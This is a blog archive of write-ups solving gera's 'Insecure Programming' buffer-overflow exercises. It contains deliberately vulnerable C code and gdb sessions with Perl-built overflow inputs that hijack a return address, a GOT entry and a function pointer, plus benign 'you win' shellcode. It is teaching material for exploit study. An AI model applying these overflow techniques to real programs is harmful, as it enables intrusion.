Category Archives: Insecure Programming by Example

Insecure Programming by Example: abo6/7/8 Ménage à trois

This post will be pretty brief, as there are no significant differences in the solution for abo6.c from other previously covered exercises, while abo7.c and abo8.c are both not exploitable. The latter two exercises demonstrate important concepts regarding the placement of variously defined variables within memory for compiled C code which I’ll outline, but it won’t take long.

abo6.c

/* abo6.c                                       *
/* specially crafted to feed your brain by gera */

/* wwwhat'u talkin' about? */

int main(int argv,char **argc) {
    char *pbuf=malloc(strlen(argc[2])+1);
    char buf[256];

    strcpy(buf,argc[1]);
    strcpy(pbuf,argc[2]);
    while(1);
}

This code is pretty much the same as the last exercise, but with an important difference, instead of a call to exit() there is a while loop that never ends at the end of the code. In the disassembly, this looks like the following:

0x08048428 :   call   0x80482f8
0x0804842d :   mov    eax,DWORD PTR [ebp+12]
0x08048430 :   add    eax,0x8
0x08048433 :   mov    eax,DWORD PTR [eax]
0x08048435 :   mov    DWORD PTR [esp+4],eax
0x08048439 :   mov    eax,DWORD PTR [ebp-12]
0x0804843c :   mov    DWORD PTR [esp],eax
0x0804843f :   call   0x80482f8
0x08048444 :   jmp    0x8048444 

So basically, it’s a unconditional jump that targets itself, therefore it never ends. Since there is no call to a library function like exit, we can’t overwrite an entry in the GOT or some such similar tactic to gain control of execution. However, where there is a will there is a way, and we must keep in mind that we can still write arbitrarily to memory so long as permissions allow. The solution in this case is nothing revolutionary, we’ll merely directly overwrite the saved return address of the second strcpy stack frame. This is an important reminder by Gera that being able to write a value into memory is a tool with many applications, some of which I’m sure I’m not even aware of at this point.

The one tricky part of this solution is to not attempt the to overwrite the saved return address of the second strcpy stack frame until you’ve passed exactly the same size arguments you will pass for the overwrite, because the location of the saved EIP for the stack frame will be different depending on the size of the values stored in argc. In the debugger, here is what the solution looks like.

hacking@hacking-theart:~/InsecureProgramming $ gdb -q ./abo6
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) disassemble main
Dump of assembler code for function main:
0x080483e4 :    push   ebp
0x080483e5 :    mov    ebp,esp
0x080483e7 :    sub    esp,0x128
0x080483ed :    and    esp,0xfffffff0
0x080483f0 :   mov    eax,0x0
0x080483f5 :   sub    esp,eax
0x080483f7 :   mov    eax,DWORD PTR [ebp+12]
0x080483fa :   add    eax,0x8
0x080483fd :   mov    eax,DWORD PTR [eax]
0x080483ff :   mov    DWORD PTR [esp],eax
0x08048402 :   call   0x80482e8
0x08048407 :   inc    eax
0x08048408 :   mov    DWORD PTR [esp],eax
0x0804840b :   call   0x8048308
0x08048410 :   mov    DWORD PTR [ebp-12],eax
0x08048413 :   mov    eax,DWORD PTR [ebp+12]
0x08048416 :   add    eax,0x4
0x08048419 :   mov    eax,DWORD PTR [eax]
0x0804841b :   mov    DWORD PTR [esp+4],eax
0x0804841f :   lea    eax,[ebp-0x118]
0x08048425 :   mov    DWORD PTR [esp],eax
0x08048428 :   call   0x80482f8
0x0804842d :   mov    eax,DWORD PTR [ebp+12]
0x08048430 :   add    eax,0x8
0x08048433 :   mov    eax,DWORD PTR [eax]
0x08048435 :   mov    DWORD PTR [esp+4],eax
0x08048439 :   mov    eax,DWORD PTR [ebp-12]
0x0804843c :   mov    DWORD PTR [esp],eax
0x0804843f :   call   0x80482f8
---Type  to continue, or q  to quit---
0x08048444 :   jmp    0x8048444
End of assembler dump.
(gdb) break *0x0804843f
Breakpoint 1 at 0x804843f: file abo6.c, line 11.
(gdb) run one two
Starting program: /home/hacking/InsecureProgramming/abo6 one two

Breakpoint 1, 0x0804843f in main (argv=3, argc=0xbffff874) at abo6.c:11
11              strcpy(pbuf,argc[2]);
(gdb) x buf
0xbffff6d0:     0x00656e6f
(gdb) x &pbuf
0xbffff7dc:     0x0804a008
(gdb) print/d 0xbffff7dc - 0xbffff6d0
$1 = 268
(gdb) run $(perl -e 'print "A" x 268 . "BBBB";') CCCC
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/hacking/InsecureProgramming/abo6 $(perl -e 'print "A" x 268 . "BBBB";') CCCC

Breakpoint 1, 0x0804843f in main (argv=3, argc=0xbffff764) at abo6.c:11
11              strcpy(pbuf,argc[2]);
(gdb) stepi
0x080482f8 in strcpy@plt ()
(gdb) where
#0  0x080482f8 in strcpy@plt ()
#1  0x08048444 in main (argv=3, argc=0xbffff764) at abo6.c:11
(gdb) info frame 0
Stack frame at 0xbffff5b0:
 eip = 0x80482f8 in strcpy@plt; saved eip 0x8048444
 called by frame at 0xbffff6e0
 Arglist at 0xbffff5a8, args:
 Locals at 0xbffff5a8, Previous frame's sp is 0xbffff5b0
 Saved registers:
  eip at 0xbffff5ac
(gdb) run $(perl -e 'print "A" x 268 . "\xac\xf5\xff\xbf";') BBBB
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/hacking/InsecureProgramming/abo6 $(perl -e 'print "A" x 268 . "\xac\xf5\xff\xbf";') BBBB

Breakpoint 1, 0x0804843f in main (argv=3, argc=0xbffff764) at abo6.c:11
11              strcpy(pbuf,argc[2]);
(gdb) next

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

abo7.c and abo8.c

These two exercises as mentioned previously are unexploitable. They highlight where variables are placed in memory when declared in a certain manner using C.

abo7.c

/* abo7.c                                       *
 * specially crafted to feed your brain by gera */

/* sometimes you can,       *
 * sometimes you don't      *
 * that's what life's about */

char buf[256]={1};

int main(int argv,char **argc) {
    strcpy(buf,argc[1]);
}

Here you have an initialized global variable in the form of buf. You can see pretty easily using the versatile objdump command that while this is a legitimate buffer overflow (using an unbounded function like strcpy), the location of this variable precludes any useful behavior for taking control of the program.

hacking@hacking-theart:~/InsecureProgramming $ objdump -x abo7 | grep buf
080495a0 g     O .data  00000100              buf
hacking@hacking-theart:~/InsecureProgramming $ objdump -x abo7

abo7:     file format elf32-i386
abo7
architecture: i386, flags 0x00000112:
EXEC_P, HAS_SYMS, D_PAGED
start address 0x080482b0
<...snip>
 10 .plt          00000040  08048270  08048270  00000270  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 11 .text         000001a0  080482b0  080482b0  000002b0  2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 12 .fini         0000001c  08048450  08048450  00000450  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 13 .rodata       00000008  0804846c  0804846c  0000046c  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 14 .eh_frame     00000004  08048474  08048474  00000474  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 15 .ctors        00000008  08049478  08049478  00000478  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 16 .dtors        00000008  08049480  08049480  00000480  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 17 .jcr          00000004  08049488  08049488  00000488  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 18 .dynamic      000000c8  0804948c  0804948c  0000048c  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 19 .got          00000004  08049554  08049554  00000554  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 20 .got.plt      00000018  08049558  08049558  00000558  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 21 .data         00000120  08049580  08049580  00000580  2**5
                  CONTENTS, ALLOC, LOAD, DATA
 22 .bss          00000004  080496a0  080496a0  000006a0  2**2
                  ALLOC

080495a0 g     O .data  00000100              buf
080496a0 g       *ABS*  00000000              _edata
08048419 g     F .text  00000000              .hidden __i686.get_pc_thunk.bx
08048374 g     F .text  0000002a              main
08048258 g     F .init  00000000              _init

abo8.c

Gera says: Don’t stay static

/* abo8.c                                       *
 * specially crafted to feed your brain by gera */

/* spot the difference */

char buf[256];

int main(int argv,char **argc) {
	strcpy(buf,argc[1]);
}

Gera continues: From the top of your head, what do you think is generally more safe, a program dynamically linked to its libraries or one statically linked to them? Now go and try it out!

In this next example, very similar restrictions apply, with Gera challenging you to spot the difference between the two. Since buf in this case is uninitialized, it is stored in the .bss section of the ELF executable.

hacking@hacking-theart:~/InsecureProgramming $ objdump -x abo8 | grep buf
080495a0 g     O .bss   00000100              buf
hacking@hacking-theart:~/InsecureProgramming $ objdump -x abo8

abo8:     file format elf32-i386
abo8
architecture: i386, flags 0x00000112:
EXEC_P, HAS_SYMS, D_PAGED
start address 0x080482b0
<...snip...>
 10 .plt          00000040  08048270  08048270  00000270  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 11 .text         000001a0  080482b0  080482b0  000002b0  2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 12 .fini         0000001c  08048450  08048450  00000450  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 13 .rodata       00000008  0804846c  0804846c  0000046c  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 14 .eh_frame     00000004  08048474  08048474  00000474  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 15 .ctors        00000008  08049478  08049478  00000478  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 16 .dtors        00000008  08049480  08049480  00000480  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 17 .jcr          00000004  08049488  08049488  00000488  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 18 .dynamic      000000c8  0804948c  0804948c  0000048c  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 19 .got          00000004  08049554  08049554  00000554  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 20 .got.plt      00000018  08049558  08049558  00000558  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 21 .data         0000000c  08049570  08049570  00000570  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 22 .bss          00000120  08049580  08049580  0000057c  2**5
                  ALLOC
 23 .comment      0000012f  00000000  00000000  0000057c  2**0
                  CONTENTS, READONLY
<...snip...>
080495a0 g     O .bss   00000100              buf
0804957c g       *ABS*  00000000              _edata
08048419 g     F .text  00000000              .hidden __i686.get_pc_thunk.bx
08048374 g     F .text  0000002a              main
08048258 g     F .init  00000000              _init

I’m a little disconcerted by the fact that I’m not sure what Gera was driving at with his hints in this one, I’ve been over and over it, and I’m pretty sure the compilation options don’t matter. If you were to compile this as a statically-linked executable, you’d still have almost nothing to work with to control execution, because buf still exists in a memory region that’s pretty much useless to have a buffer overflow in. I’m sure there is some point, but I don’t see it. It may be that with an older compiler on an older distribution this example had some useful lessons to teach, certainly the point about .data versus .bss is well taken. In a previous exercise, I alluded to a paper by Juan M. Bello Rivas (see Books & Pubs for more) on overwriting .dtors 0xFFFFFFFF values to redirect execution which I think would also have some possibilities for these examples, but I don’t have an old enough system to test on.

For the last word on this particular issue (and the general usefulness of control of variables in these sections) I’d like to provide an excerpt from the book The Art of Software Security Assessment by Mark Dowd, John McDonald, and Justin Schuh.  This book is a nice resource to have, I’d recommend that if you don’t already own it you go purchase a copy and keep it on the shelf, using it as a pre-Google resource or jumping off point.

Global and Static Data Overflows

Global and static variables are used to store data that persists between different function calls, so they are generally stored in a different memory segment than stack and heap variables are. Normally, these locations don’t contain general program runtime data structures, such as stack activation records and heap chunk data, so exploiting an overflow in this segment requires application-specific attacks similar to the vulnerability in Listing 5-2. Exploitability depends on what variables can be corrupted when the buffer overflow occurs and how the variables are used. For example, if pointer variables can be corrupted, the likelihood of exploitation increases, as this corruption introduces the possibility for arbitrary memory overwrites.

Listing 5-2

Off-by-One Length Miscalculation

int authenticate(char *username, char *password)
{
    int authenticated;
    char buffer[1024];

    authenticated = verify_password(username, password);

    if(authenticated == 0)
    {
        sprintf(buffer, "password is incorrect for user %s\n", username);
        log("%s", buffer);
    }

    return authenticated;
}

Next up, we screw with malloc and make it to what we want, trying to learn something about it’s implementation to boot.

Insecure Programming by Example: abo5.c we GOT this…

Introduction

I actually solved this one a bit ago, while messing around at the GFIRST 2010 conference in San Antonio. Just now getting around to writing it up.

Here is the code for abo5.c:

Gera says: ch-ch-ch-changes

/* abo5.c                                                  *
 * specially crafted to feed your brain by gera@core-sdi.com */

/* You take the blue pill, you wake up in your bed,    *
 *     and you believe what you want to believe        *
 * You take the red pill,                              *
 *     and I'll show you how deep goes the rabbit hole */

int main(int argv,char **argc) {
	char *pbuf=malloc(strlen(argc[2])+1);
	char buf[256];

	strcpy(buf,argc[1]);
	for (;*pbuf++=*(argc[2]++););
	exit(1);
}

Use your sixth sense, will you be able to gain control given the possibility of writing wherever you wish in memory?

As you can see, this is very similar code to the abo4.c exercise. Gera’s words are the keys to this exercise…as is often the case he’s given us a clue. We know very well from our previous trials and tribulations with abo4.c that by overflowing the pointer address of pbuf on the stack, we can essentially control 4-bytes of data at an arbitrary writeable location in the memory of the running process. This ends up being the key to successful exploitation of this code snippet.

Disassembly

Let’s take a look at the disassembled code, with the important bits highlighted.

(gdb) disassemble main
Dump of assembler code for function main:
0x08048414 <main+0>:    push   ebp
0x08048415 <main+1>:    mov    ebp,esp
0x08048417 <main+3>:    sub    esp,0x128
0x0804841d <main+9>:    and    esp,0xfffffff0
0x08048420 <main+12>:   mov    eax,0x0
0x08048425 <main+17>:   sub    esp,eax
0x08048427 <main+19>:   mov    eax,DWORD PTR [ebp+12]
0x0804842a <main+22>:   add    eax,0x8
0x0804842d <main+25>:   mov    eax,DWORD PTR [eax]
0x0804842f <main+27>:   mov    DWORD PTR [esp],eax
0x08048432 <main+30>:   call   0x804830c <strlen@plt>
0x08048437 <main+35>:   inc    eax
0x08048438 <main+36>:   mov    DWORD PTR [esp],eax
0x0804843b <main+39>:   call   0x804832c <malloc@plt>
0x08048440 <main+44>:   mov    DWORD PTR [ebp-12],eax
0x08048443 <main+47>:   mov    eax,DWORD PTR [ebp+12]
0x08048446 <main+50>:   add    eax,0x4
0x08048449 <main+53>:   mov    eax,DWORD PTR [eax]
0x0804844b <main+55>:   mov    DWORD PTR [esp+4],eax
0x0804844f <main+59>:   lea    eax,[ebp-0x118]
0x08048455 <main+65>:   mov    DWORD PTR [esp],eax
0x08048458 <main+68>:   call   0x804831c <strcpy@plt>
0x0804845d <main+73>:   mov    eax,DWORD PTR [ebp-12]
0x08048460 <main+76>:   mov    ecx,eax
0x08048462 <main+78>:   mov    eax,DWORD PTR [ebp+12]
0x08048465 <main+81>:   add    eax,0x8
0x08048468 <main+84>:   mov    edx,DWORD PTR [eax]
0x0804846a <main+86>:   movzx  edx,BYTE PTR [edx]
0x0804846d <main+89>:   inc    DWORD PTR [eax]
0x0804846f <main+91>:   mov    BYTE PTR [ecx],dl
0x08048471 <main+93>:   lea    eax,[ebp-12]
0x08048474 <main+96>:   inc    DWORD PTR [eax]
0x08048476 <main+98>:   test   dl,dl
0x08048478 <main+100>:  jne    0x804845d <main+73>
0x0804847a <main+102>:  mov    DWORD PTR [esp],0x1
0x08048481 <main+109>:  call   0x804833c <exit@plt>
End of assembler dump.

The first highlighted line contains the call to strcpy that will overwrite the pointer value with the value presented as argv[2] or the second command line argument. The bit in between the first and second highlighted line is the implementation of the for loop that overwrites *pbuf with the value in argv[2], and the second highlighted line is the call to exit. As you can see in the disassembly and when reviewing the source, this code is slightly different from the previous pointer-overwrite exercise, in that there is no call to the pointer afterward. So we can’t control execution in that manner. We could do a saved return address overwrite, since we essentially have control over a single DWORD in writeable memory (the stack being a writeable memory location of course) but unfortunately there is a pesky call to exit that will prevent us from using that method.

Actually if you’ve taken a look, you’ve realized that pretty much the only thing that happens after we overwrite the pointer value is a call to exit. Hmm…how can we use this to our advantage? Well first, you’ll note that the call to the exit routine is actually not as clear cut as it seems. It’s actually a call to a pointer in memory…perhaps we can control this call location?

Dynamic Linking

The reason that this call is exploitable is because the program is dynamically linked. The gist of the meaning of dynamic linking is essentially the ability of a program to be compiled with references to external functions (functions that exist in some header file which has been compiled somewhere, for instance stdio.h and the printf) which are resolved at run time or load time (linking and loading being beyond the scope of this article and indeed my knowledge), sometimes you may hear it referred to as run time linking for that reason. This is what .dll files on Windows are for, and .so files on Linux and UNIX. Essentially, they contain functions that might be useful to have on the system, or functions that are specified to be available by the C or C++ standards, and allows them to be shared among multiple external programs without the need to directly compile them inline into the code. This provides a few advantages, off the top of my head the most obvious ones being you can change the code in a commonly used function only once to fix a bug and it propagates to a bunch of other code automatically, and that you reduce the compiled size and complexity of a given code base. In all of these operating systems that use dynamic linking there is some sort of a look up table that allows programs to resolved run time linked functions, in Linux and UNIX this look up table is called the GOT, or Global Offset Table and it works in close conjunction with another structure called the Procedure Linkage Table or PLT.

Taking a Look Under the Hood

There is a lot of documentation to be found describing the structure and implementation of the GOT and PLT on Linux machines, and I’ve included some that I’ve found useful at the end of this post. In this case, I think I’d rather just take a look at the assembly and let that point us in the right direction. Honestly, so long as you understand that you can write an arbitrary 4-byte value anywhere you want to (that is writeable and won’t produce a segfault) you can reason out what to do here without knowing much or at all about the GOT or PLT.

Let’s step through the call to exit and see what we find.

0x08048481 <main+109>:  call   0x804833c <exit@plt>
End of assembler dump.
(gdb) x/i 0x804833c
0x804833c <exit@plt>:   jmp    DWORD PTR ds:0x8049668
(gdb) x/xw 0x8049668
0x8049668 <_GLOBAL_OFFSET_TABLE_+32>:   0x08048342

First we’ve got displayed the call to 0x804833c, which is the location of exit in the aforementioned PLT. So we’ll examine the instruction at that address, which is essentially an unconditional jump to the address contained in a pointer. This pointer, as you can see from the results of the final command we ran, is in the GOT, and contains the value 0x08048342. If we were to overwrite that value with some shellcode on the stack, we’ll have control of execution. Here is what that would look like.

First we’ll determine the distance between the address of buf and pbuf on the stack.

(gdb) break 1
Breakpoint 2 at 0x8048414: file abo5.c, line 1.
(gdb) run one two
Starting program: /home/hacking/InsecureProgramming/abo5 one two

Breakpoint 2, main (argv=134513684, argc=0x3) at abo5.c:9
9       int main(int argv,char **argc) {
(gdb) x/x &buf
0xbffff730:     0x0804819c
(gdb) x/x &pbuf
0xbffff83c:     0xb8000ff4
(gdb) print/d 0xbffff83c - 0xbffff730
$4 = 268

Then we’ll do our at-this-point-very-common magic with the shellcode we’ve been using all along, the address on the GOT for exit, the getenvaddr.c code that was generously provided by Hacking: The Art of Exploitation, and all the rest.

hacking@hacking-theart:~/InsecureProgramming $ hexdump -C print_youwin_shellcode
00000000  eb 13 59 31 c0 b0 04 31  db 43 31 d2 b2 0a cd 80  |..Y1...1.C1.....|
00000010  b0 01 4b cd 80 e8 e8 ff  ff ff 79 6f 75 20 77 69  |..K.......you wi|
00000020  6e 21 0a 0d                                       |n!..|
00000024
hacking@hacking-theart:~/InsecureProgramming $ export SHELLCODE=$(cat print_youwin_shellcode)
hacking@hacking-theart:~/InsecureProgramming $ echo $SHELLCODE
?Y1??1?C1? ??K??????you win!
hacking@hacking-theart:~/InsecureProgramming $ ./getenvaddr SHELLCODE ./abo5
SHELLCODE will be at 0xbffff9ec
hacking@hacking-theart:~/InsecureProgramming $ ./abo5 $(perl -e 'print "A" x 268 . "\x68\x96\x04\x08";') $(perl -e 'print "\xec\xf9\xff\xbf";')
you win!

There we go, that’s all for now :-).

References

I didn’t really use these references to develop this post, but in perusing them I thought they’d be useful for someone wanting a bit more in-depth explanation of some of the concepts in here.

Executable and Linking Format (ELF) by unknown author, Tool Interface Standards, Portable Formats Specification, Ver 1.1
Dynamic Linking in Linux and Windows by Reji Thomas and Bhasker Reddy, Symantec
Understanding Memory by University of Alberta AICT Research and Support

Insecure Programming by Example: abo4.c POINTER MADNESS

Introduction

I love sensational titles.

Here is abo4.c:

/* abo4.c                                                    *
 * specially crafted to feed your brain by gera@core-sdi.com */

/* After this one, the next is just an Eureka! away          */

extern system,puts;
void (*fn)(char*)=(void(*)(char*))&system;

int main(int argv,char **argc) {
	char *pbuf=malloc(strlen(argc[2])+1);
	char buf[256];

	fn=(void(*)(char*))&puts;
	strcpy(buf,argc[1]);
	strcpy(pbuf,argc[2]);
	fn(argc[3]);
	while(1);
}

Gera says:

oh pointers, pointers!
Do you remember when you had problems with * and &? everybody has that kind of problems at least once when learning C, what about poiners to pointers? let’s see…

There are a few elements of this that we should go over before we review the disassembly itself, though of course that will prove to be the most fruitful way to attack most problems like this it seems to me there’s lots of C here that we haven’t seen before.

First, let’s address the use of the extern keyword. From what I can tell, this was declared so that we could utilize the unary address-of operator on functions imported from the header file stdio.h and whatever the heck contains system. I’d love to be corrected, I’m no C ninja, but other than that I can’t see the point of it. Some documentation on extern is available here, if you want to peruse it on your own…this is what led me to this conclusion.

Now for the life of me, I can’t figure out what the heck he’s doing on the next line with the void pointer to system, I should email him and ask but I hear he’s a busy guy ;-). Maybe that one will come out in the comments as well. The pointer bits are important though, as we’ll see in a bit.

The last thing we should mention here is the usage within main of malloc to allocate a buffer, as I think this is the first time it’s come up. Documentation on the usage of malloc can be found here, essentially what this code is doing is naming a pointer of type char (1 byte size, for the purposes of pointer arithmetic), and pointing this pointer to the value returned by malloc. The value returned by malloc based on reading it’s arguments is the length of the second argument submitted to main plus one byte…this is done to allow for strcpy to include the NULL byte at the end of the string submitted as the argument, otherwise you might get more than you intended in this chunk of memory.

In the Debugger

Now let’s take a look at the disassembly of the program itself once it’s compiled in GCC, using our favorite debugger GDB.

(gdb) disassemble main
Dump of assembler code for function main:
0x08048444 : push ebp
0x08048445 : mov ebp,esp
0x08048447 <main+3>: sub esp,0x128
0x0804844d : and esp,0xfffffff0
0x08048450 : mov eax,0x0
0x08048455 : sub esp,eax
0x08048457 : mov eax,DWORD PTR [ebp+12]
0x0804845a : add eax,0x8
0x0804845d : mov eax,DWORD PTR [eax]
0x0804845f : mov DWORD PTR [esp],eax
0x08048462 <main+30>: call 0x8048340 <strlen@plt>
0x08048467 : inc eax
0x08048468 : mov DWORD PTR [esp],eax
0x0804846b : call 0x8048360
0x08048470 : mov DWORD PTR [ebp-12],eax
0x08048473 : mov DWORD PTR ds:0x80496bc,0x8048370
0x0804847d : mov eax,DWORD PTR [ebp+12]
0x08048480 : add eax,0x4
0x08048483 : mov eax,DWORD PTR [eax]
0x08048485 : mov DWORD PTR [esp+4],eax
0x08048489 : lea eax,[ebp-0x118]
0x0804848f : mov DWORD PTR [esp],eax
0x08048492 <main+78>: call 0x8048350 <strcpy@plt>
0x08048497 : mov eax,DWORD PTR [ebp+12]
0x0804849a : add eax,0x8
0x0804849d : mov eax,DWORD PTR [eax]
0x0804849f : mov DWORD PTR [esp+4],eax
0x080484a3 : mov eax,DWORD PTR [ebp-12]
0x080484a6 : mov DWORD PTR [esp],eax
0x080484a9 : call 0x8048350
0x080484ae : mov eax,DWORD PTR [ebp+12]
0x080484b1 : add eax,0xc
0x080484b4 : mov eax,DWORD PTR [eax]
0x080484b6 : mov DWORD PTR [esp],eax
0x080484b9 : mov eax,ds:0x80496bc
0x080484be : call eax
0x080484c0 : jmp 0x80484c0
End of assembler dump.

I’ve taken the liberty of highlighting the function calls. It seems to me that any time you see a call eax your ears should prick up. This is the spot where we have to exploit the program, as right after that you have an unconditional jump to itself, the infinite loop at the end of the program which prevents us from overwriting the saved return address and exploiting upon exit from main.

What we have with this program is essentially two insecure functions, and then a call to a program-defined function which is a pointer stored at 0x80496bc…if we can somehow modify what address is here, we can control execution of the program and win.

Draw the Stack

Let’s take a look at the variables on the stack, which we can likely control with our wonderful unbounded strcpy call.

(gdb) x
0xbffff730: 0x080481b0
(gdb) x
0xbffff83c: 0xb8000ff4
(gdb) x
0x80496bc : 0x08048320
(gdb) print 0xbffff83c - 0xbffff730
$1 = 268

Your spider sense should be tingling here. Let’s ask ourselves what the program is doing…first it copies via an insecure function an unbounded amount of data to the stack. The same stack that contains the pointer to which another insecure function will be used to copy to. This fatal combination of (intentional and educational!) errors allows us to write any amount of data we want to an arbitrary write-able location in the program’s memory. We can use this to our advantage and overwrite the address stored in the fn function pointer, and essentially execute wherever we wish.

Keeping in mind that the variables are 268 bytes away from each other, here is a proof-of-concept detailing the control of the EIP register. What we are doing is submitting the first argument (the string copied by the first copy function) as a 272-byte string, 268 bytes of junk to get us to the overwrite of the location of pbuf and then the address of the fn pointer. Then we’ll submit the second argument which is what will overwrite fn as 0x41414141 or “AAAA”. The third argument we’ll submit but leave alone as it will never get used. Upon execution, it attempts to call the value stored at fn, and segfaults. Examining EIP proves our control of execution. If you want to take this one all the way, you could follow the tried-and-true technique of storing shellcode to execute in an environment variable and determining it’s address with a special program, a technique I detailed in the abo1.c post I did some time ago. Happy hunting!

(gdb) run $(perl -e 'print "A" x 268 . "\xbc\x96\x04\x08";') AAAA three
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/hacking/InsecureProgramming/abo4 $(perl -e 'print "A" x 268 . "\xbc\x96\x04\x08";') AAAA three

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x $eip
0x41414141: Cannot access memory at address 0x41414141
(gdb) x
0x80496bc <fn>: 0x41414141

Insecure Programming by Example: abo3.c

Updated 03/20/2010 to add an excellent introduction to pointers in C and C++.

The theme for this exercise was provided by one of the folks I follow on Twitter.

@kpyke: And so sayeth the @pusscat: “If you gave me the source code, I’d just compile it and look at it in a debugger anyways…”

This got me thinking, especially in the context of this challenge, that the source code sometimes isn’t all that useful. This is true in this case with this exercise. And maybe this is a milestone in my understanding of “how shit works”, but I have a feeling I’ll be spending a lot more time with the built-in disassemblers in gdb/Ollydbg/Windbg than with a list of the source.  This time, we’ll be working on abo3.c, the next in gera’s series on Insecure Programming. I’m aiming for brevity from now on in these posts so they are not so much work (I’m lazy), so let’s get straight to the code.

gera says:

microprocessor ownership

How to make the microprocessor make what you want? Who owns the Instruction Pointer, owns the execution flow, and that’s what we need. All bytes are composed of bits, but some of them are just numbers, and some of them are addresses to code. Jump! Geronimoooooooooo…

/* abo3.c                                                    *
 * specially crafted to feed your brain by gera@core-sdi.com */

/* This'll prepare you for The Next Step                     */

int main(int argv,char **argc) {
   extern system,puts;
   void (*fn)(char*)=(void(*)(char*))&system;
   char buf[256];

   fn=(void(*)(char*))&puts;
   strcpy(buf,argc[1]);
   fn(argc[2]);
   exit(1);
}

gera continues:

buf is in the stack, and after it are some bits you can change, that you’ve learnt in abo1.

In case you wonder why we put that there, is so the linker doesn’t remove it.

This exercise makes use of a couple of things we haven’t covered in previous posts. One, this code uses the extern keyword in the C language to make the system and puts functions available. What this does (I think) is basically references directly the location of a function defined in the (implied) header files…I get the impression that GDB is auto-magically including the header files stdlib.h for system and stdio.h for puts.  One thing that is not immediately clear is that the system and puts addresses are both written to the same location, I think that might be what gera is talking about “so the linker doesn’t remove it”.  Secondly, this code makes extensive use of pointers in C, which is a subject I probably need to learn a lot more on.  As a quick summary, pointers contain a memory address, and have various unary operators that apply to them.  For a pointer named (creatively) POINTER, you could use the & or address-of operator to know the actual address of the variable – &POINTER, or you could use POINTER without any operators and that will return the memory address that POINTER contains, or you could dereference the variable using the * operator like *POINTER and that gives you the data contained at the address the pointer references.  Pointers can get nested, and be generally confusing.  You should read up on this, as it’s an important subject, and I’m not speaking from a great deal of experience.

As is always the case, we’ll not focus too much on the high-level representation of this code, rather, we’ll disassemble it in GDB. Here is a deadlist of the compiled executable.

(gdb) disassemble main
Dump of assembler code for function main:
0x08048414 <main+0>:    push   ebp
0x08048415 <main+1>:    mov    ebp,esp
0x08048417 <main+3>:    sub    esp,0x128
0x0804841d <main+9>:    and    esp,0xfffffff0
0x08048420 <main+12>:   mov    eax,0x0
0x08048425 <main+17>:   sub    esp,eax
0x08048427 <main+19>:   mov    DWORD PTR [ebp-12],0x80482fc
0x0804842e <main+26>:   mov    DWORD PTR [ebp-12],0x804832c
0x08048435 <main+33>:   mov    eax,DWORD PTR [ebp+12]
0x08048438 <main+36>:   add    eax,0x4
0x0804843b <main+39>:   mov    eax,DWORD PTR [eax]
0x0804843d <main+41>:   mov    DWORD PTR [esp+4],eax
0x08048441 <main+45>:   lea    eax,[ebp-0x118]
0x08048447 <main+51>:   mov    DWORD PTR [esp],eax
0x0804844a <main+54>:   call   0x804831c <strcpy@plt>
0x0804844f <main+59>:   mov    eax,DWORD PTR [ebp+12]
0x08048452 <main+62>:   add    eax,0x8
0x08048455 <main+65>:   mov    eax,DWORD PTR [eax]
0x08048457 <main+67>:   mov    DWORD PTR [esp],eax
0x0804845a <main+70>:   mov    eax,DWORD PTR [ebp-12]
0x0804845d <main+73>:   call   eax
0x0804845f <main+75>:   mov    DWORD PTR [esp],0x1
0x08048466 <main+82>:   call   0x804833c <exit@plt>
End of assembler dump.

As is the case it seems when trying to do these exploits, we basically have to ask ourselves what it is within the programs execution that we control? Where does the program accept input from the user, and what does that mean to us? In this case, the program is using the ever-awesome strcpy function, which of course does not do a bounds check, and is copying a bunch of our data to the stack (as much as we want). We would typically move forward with overwriting the main stack frame’s return address, and controlling execution that way. Unfortunately, there is a pesky call to exit which we first encountered in the last example that will prevent us from doing that.

So we’ll have to go some other route. The obvious candidate to me is the call eax instruction. If we can somehow control the contents of the eax register at that point, we can take control of execution, and run arbitrary code. I think this particular exercise contains an important lesson; sometimes the actual high level code can be harder to understand than the disassembled code. I personally feel that this is the case here. If we only pay attention to what’s in the debugger, this is actually not such a tricky exercise.

We know fn is a function pointer that is called. In the deadlisting, it resides at ebp-12. Basically, if we can control the contents of ebp-12 we can control execution. This actually turns out to be really easy, since fn is declared in main as a stack variable by the assembler it will be trivial to overwrite with the unbounded strcpy() call. Here is a record of the exploit.

hacking@hacking-theart:~/InsecureProgramming $ gdb -q abo3
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
0x08048414 <main+0>:    push   ebp
0x08048415 <main+1>:    mov    ebp,esp
0x08048417 <main+3>:    sub    esp,0x128
0x0804841d <main+9>:    and    esp,0xfffffff0
0x08048420 <main+12>:   mov    eax,0x0
0x08048425 <main+17>:   sub    esp,eax
0x08048427 <main+19>:   mov    DWORD PTR [ebp-12],0x80482fc
